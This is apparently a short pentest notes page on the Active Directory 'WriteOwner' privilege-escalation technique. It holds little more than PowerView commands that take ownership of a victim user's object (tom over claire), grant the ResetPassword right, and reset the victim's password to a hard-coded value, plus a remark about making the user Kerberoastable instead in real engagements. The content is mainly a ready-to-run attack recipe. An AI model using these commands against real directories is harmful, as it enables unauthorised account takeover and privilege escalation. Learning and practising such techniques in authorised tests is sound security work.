WriteOwner Exploit
Refer to: https://www.youtube.com/watch?v=ob9SgtFm6_g&t=1431s
What is the WriteOwner Permission For?
Scenario:


Attack Path


Last updated
Refer to: https://www.youtube.com/watch?v=ob9SgtFm6_g&t=1431s




Last updated
### Set tom as the owner of claire’s ACL
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
### Give tom permissions to change passwords on that ACL
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
### Create powershell credential and change credentials.
### NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROSTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT
$cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred